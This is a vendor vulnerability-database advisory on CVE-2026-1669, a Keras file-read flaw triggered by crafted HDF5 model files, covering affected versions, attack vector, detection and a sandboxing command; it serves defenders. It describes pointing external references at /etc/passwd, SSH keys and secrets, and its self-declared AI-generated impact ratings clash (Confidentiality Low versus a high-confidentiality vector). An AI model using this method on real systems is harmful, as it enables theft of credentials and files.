Join the Cyber Forum: Threat Intel on May 12, 2026 to learn how AI is reshaping threat defense.Join the Virtual Cyber Forum: Threat IntelRegister Now
Experiencing a Breach?Blog
Get StartedContact Us
SentinelOne
  • Platform
    Platform Overview
    • Singularity Platform
      Welcome to Integrated Enterprise Security
    • AI for Security
      Leading the Way in AI-Powered Security Solutions
    • Securing AI
      Accelerate AI Adoption with Secure AI Tools, Apps, and Agents.
    • How It Works
      The Singularity XDR Difference
    • Singularity Marketplace
      One-Click Integrations to Unlock the Power of XDR
    • Pricing & Packaging
      Comparisons and Guidance at a Glance
    Data & AI
    • Purple AI
      Accelerate SecOps with Generative AI
    • Singularity Hyperautomation
      Easily Automate Security Processes
    • AI-SIEM
      The AI SIEM for the Autonomous SOC
    • AI Data Pipelines
      Security Data Pipeline for AI SIEM and Data Optimization
    • Singularity Data Lake
      AI-Powered, Unified Data Lake
    • Singularity Data Lake for Log Analytics
      Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
    Endpoint Security
    • Singularity Endpoint
      Autonomous Prevention, Detection, and Response
    • Singularity XDR
      Native & Open Protection, Detection, and Response
    • Singularity RemoteOps Forensics
      Orchestrate Forensics at Scale
    • Singularity Threat Intelligence
      Comprehensive Adversary Intelligence
    • Singularity Vulnerability Management
      Application & OS Vulnerability Management
    • Singularity Identity
      Identity Threat Detection and Response
    Cloud Security
    • Singularity Cloud Security
      Block Attacks with an AI-Powered CNAPP
    • Singularity Cloud Native Security
      Secure Cloud and Development Resources
    • Singularity Cloud Workload Security
      Real-Time Cloud Workload Protection Platform
    • Singularity Cloud Data Security
      AI-Powered Threat Detection for Cloud Storage
    • Singularity Cloud Security Posture Management
      Detect and Remediate Cloud Misconfigurations
    Securing AI
    • Prompt Security
      Secure AI Tools Across Your Enterprise
  • Why SentinelOne?
    Why SentinelOne?
    • Why SentinelOne?
      Cybersecurity Built for What’s Next
    • Our Customers
      Trusted by the World’s Leading Enterprises
    • Industry Recognition
      Tested and Proven by the Experts
    • About Us
      The Industry Leader in Autonomous Cybersecurity
    Compare SentinelOne
    • Arctic Wolf
    • Broadcom
    • CrowdStrike
    • Cybereason
    • Microsoft
    • Palo Alto Networks
    • Sophos
    • Splunk
    • Trellix
    • Trend Micro
    • Wiz
    Verticals
    • Energy
    • Federal Government
    • Finance
    • Healthcare
    • Higher Education
    • K-12 Education
    • Manufacturing
    • Retail
    • State and Local Government
  • Services
    Managed Services
    • Managed Services Overview
      Wayfinder Threat Detection & Response
    • Threat Hunting
      World-Class Expertise and Threat Intelligence
    • Managed Detection & Response
      24/7/365 Expert MDR Across Your Entire Environment
    • Incident Readiness & Response
      DFIR, Breach Readiness, & Compromise Assessments
    Support, Deployment, & Health
    • Technical Account Management
      Customer Success with Personalized Service
    • SentinelOne GO
      Guided Onboarding & Deployment Advisory
    • SentinelOne University
      Live and On-Demand Training
    • Services Overview
      Comprehensive Solutions for Seamless Security Operations
    • SentinelOne Community
      Community Login
  • Partners
    Our Network
    • MSSP Partners
      Succeed Faster with SentinelOne
    • Singularity Marketplace
      Extend the Power of S1 Technology
    • Cyber Risk Partners
      Enlist Pro Response and Advisory Teams
    • Technology Alliances
      Integrated, Enterprise-Scale Solutions
    • SentinelOne for AWS
      Hosted in AWS Regions Around the World
    • Channel Partners
      Deliver the Right Solutions, Together
    • SentinelOne for Google Cloud
      Unified, Autonomous Security Giving Defenders the Advantage at Global Scale
    • Partner Locator
      Your Go-to Source for Our Top Partners in Your Region
    Partner Portal→
  • Resources
    Resource Center
    • Case Studies
    • Data Sheets
    • eBooks
    • Reports
    • Videos
    • Webinars
    • Whitepapers
    • Events
    View All Resources→
    Blog
    • Feature Spotlight
    • For CISO/CIO
    • From the Front Lines
    • Identity
    • Cloud
    • macOS
    • SentinelOne Blog
    Blog→
    Tech Resources
    • SentinelLABS
    • Ransomware Anthology
    • Cybersecurity 101
  • About
    About SentinelOne
    • About SentinelOne
      The Industry Leader in Cybersecurity
    • Investor Relations
      Financial Information & Events
    • SentinelLABS
      Threat Research for the Modern Threat Hunter
    • Careers
      The Latest Job Opportunities
    • Press & News
      Company Announcements
    • Cybersecurity Blog
      The Latest Cybersecurity Threats, News, & More
    • FAQ
      Get Answers to Our Most Frequently Asked Questions
    • DataSet
      The Live Data Platform
    • S Foundation
      Securing a Safer Future for All
    • S Ventures
      Investing in the Next Generation of Security, Data and AI
  • Pricing
Get StartedContact Us
CVE Vulnerability Database
Vulnerability Database/CVE-2026-1669

CVE-2026-1669: Keras File Read Vulnerability

CVE-2026-1669 is an information disclosure vulnerability in Keras versions 3.0.0 through 3.13.1. Attackers can read local files via crafted HDF5 model files. This article covers technical details, affected versions, and mitigation.

Published: February 13, 2026

CVE-2026-1669 Overview

CVE-2026-1669 is an arbitrary file read vulnerability affecting the model loading mechanism in Keras, specifically within the HDF5 integration component. This vulnerability allows a remote attacker to read local files and disclose sensitive information by crafting a malicious .keras model file that exploits HDF5 external dataset references. The vulnerability impacts Keras versions 3.0.0 through 3.13.1 across all supported platforms.

Critical Impact

Attackers can leverage crafted model files to exfiltrate sensitive data from target systems, potentially exposing credentials, configuration files, and other confidential information through the HDF5 external reference mechanism.

Affected Products

  • Keras 3.0.0 through 3.13.1
  • All platforms supporting Keras 3.x with HDF5 integration
  • Applications loading untrusted .keras model files

Discovery Timeline

  • 2026-02-11 - CVE-2026-1669 published to NVD
  • 2026-02-12 - Last updated in NVD database

Technical Details for CVE-2026-1669

Vulnerability Analysis

This vulnerability is classified under CWE-73 (External Control of File Name or Path), which occurs when software constructs a file path using externally supplied input without proper validation. In this case, the Keras model loading mechanism fails to adequately sanitize external dataset references embedded within HDF5-formatted model files.

When Keras loads a .keras model file containing HDF5 data, it processes external dataset references that can point to arbitrary file paths on the local system. An attacker can craft a malicious model file with external references pointing to sensitive files such as /etc/passwd, configuration files, SSH keys, or application secrets. When the victim loads this model, Keras follows the external references and reads the contents of the specified files, exposing them to the attacker.

The network-based attack vector with no privilege requirements makes this particularly concerning for machine learning workflows that involve loading models from external or untrusted sources—a common practice in collaborative ML development and model sharing platforms.

Root Cause

The root cause lies in insufficient validation of HDF5 external dataset references during the model deserialization process. The HDF5 file format supports external links that can reference data stored in separate files. Keras's model loading implementation trusts these external references without verifying that they point to legitimate model data files rather than sensitive system files.

The vulnerability specifically manifests because:

  1. HDF5 external dataset references are processed without path validation
  2. No allowlist or blocklist restricts which files can be referenced
  3. The referenced file contents are read and potentially exposed during model loading operations

Attack Vector

The attack exploits the network-accessible nature of model sharing. An attacker crafts a malicious .keras model file containing HDF5 external dataset references pointing to sensitive local files on the target system. This file can be distributed through:

  • Public model repositories and sharing platforms
  • Phishing emails with attached model files
  • Compromised model hosting services
  • Supply chain attacks on ML pipelines

When a victim loads the crafted model using Keras, the HDF5 library follows the external references and reads the specified files. The attacker can then capture this information through error messages, model outputs, or by embedding exfiltration mechanisms within the model structure. This attack requires user interaction (loading the malicious model) but no authentication or privileges on the target system.

Detection Methods for CVE-2026-1669

Indicators of Compromise

  • Presence of .keras model files from untrusted or unknown sources in ML pipeline directories
  • Unexpected file read operations originating from Python processes running Keras/TensorFlow
  • HDF5 files containing external dataset references pointing to system paths like /etc/, /home/, or Windows system directories
  • Anomalous network traffic following model loading operations that may indicate data exfiltration

Detection Strategies

  • Monitor file system access patterns for Keras/TensorFlow processes attempting to read files outside expected model directories
  • Implement file integrity monitoring on sensitive configuration files to detect unauthorized read attempts
  • Analyze incoming .keras and HDF5 files for external dataset references before loading into production environments
  • Deploy application-level logging to capture model loading events and associated file operations

Monitoring Recommendations

  • Configure endpoint detection to alert on Python processes accessing sensitive system files during ML operations
  • Implement network segmentation to limit outbound connectivity from ML processing environments
  • Enable audit logging for file read operations in directories containing sensitive data
  • Deploy SentinelOne Singularity to detect and prevent unauthorized file access patterns associated with this vulnerability class

How to Mitigate CVE-2026-1669

Immediate Actions Required

  • Update Keras to a patched version beyond 3.13.1 when available
  • Audit all existing .keras model files in your environment for external dataset references
  • Implement strict controls on model file sources, accepting only models from trusted and verified origins
  • Isolate ML model loading operations in sandboxed environments with restricted file system access

Patch Information

Refer to the GitHub Security Advisories for official patch information and updated Keras releases addressing this vulnerability. Organizations should monitor the Keras project's security announcements for remediation guidance.

Workarounds

  • Validate and sanitize all .keras model files before loading by inspecting HDF5 structures for external references
  • Run model loading operations in containerized environments with minimal file system access and no access to sensitive files
  • Implement a model vetting process that scans incoming models for potentially malicious external references before deployment
  • Use file system access controls to prevent Keras processes from reading files outside designated model directories
bash
# Example: Restrict file access for ML processes using container isolation
# Run Keras model loading in a restricted container with limited filesystem access
docker run --rm \
  --read-only \
  --tmpfs /tmp \
  -v /path/to/trusted/models:/models:ro \
  --security-opt no-new-privileges \
  keras-sandbox python load_model.py /models/model.keras

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

  • Vulnerability Details
  • TypeInformation Disclosure

  • Vendor/TechKeras

  • SeverityHIGH

  • CVSS Score7.1

  • EPSS Probability0.10%

  • Known ExploitedNo
  • CVSS Vector
  • CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
  • Impact Assessment
  • ConfidentialityLow
  • IntegrityLow
  • AvailabilityNone
  • CWE References
  • CWE-73
  • Technical References
  • GitHub Security Advisories
  • Related CVEs
  • CVE-2026-1462: Keras Package RCE Vulnerability

  • CVE-2025-49655: Keras Framework RCE Vulnerability

  • CVE-2024-3660: Keras Framework RCE Vulnerability

  • CVE-2024-55459: Keras RCE Vulnerability
Default Legacy - Prefooter | Experience the World’s Most Advanced Cybersecurity Platform

Experience the World’s Most Advanced Cybersecurity Platform

See how our intelligent, autonomous cybersecurity platform can protect your organization now and into the future.

Try SentinelOne
  • Get Started
  • Get a Demo
  • Product Tour
  • Why SentinelOne
  • Pricing & Packaging
  • FAQ
  • Contact
  • Contact Us
  • Customer Support
  • SentinelOne Status
  • Language
  • Platform
  • Singularity Platform
  • Singularity Endpoint
  • Singularity Cloud
  • Singularity AI-SIEM
  • Singularity Identity
  • Singularity Marketplace
  • Purple AI
  • Services
  • Wayfinder TDR
  • SentinelOne GO
  • Technical Account Management
  • Support Services
  • Verticals
  • Energy
  • Federal Government
  • Finance
  • Healthcare
  • Higher Education
  • K-12 Education
  • Manufacturing
  • Retail
  • State and Local Government
  • Cybersecurity for SMB
  • Resources
  • Blog
  • Labs
  • Case Studies
  • Videos
  • Product Tours
  • Events
  • Cybersecurity 101
  • eBooks
  • Webinars
  • Whitepapers
  • Press
  • News
  • Ransomware Anthology
  • Company
  • About Us
  • Our Customers
  • Careers
  • Partners
  • Legal & Compliance
  • Security & Compliance
  • Investor Relations
  • S Foundation
  • S Ventures

©2026 SentinelOne, All Rights Reserved.

Privacy Notice Terms of Use

English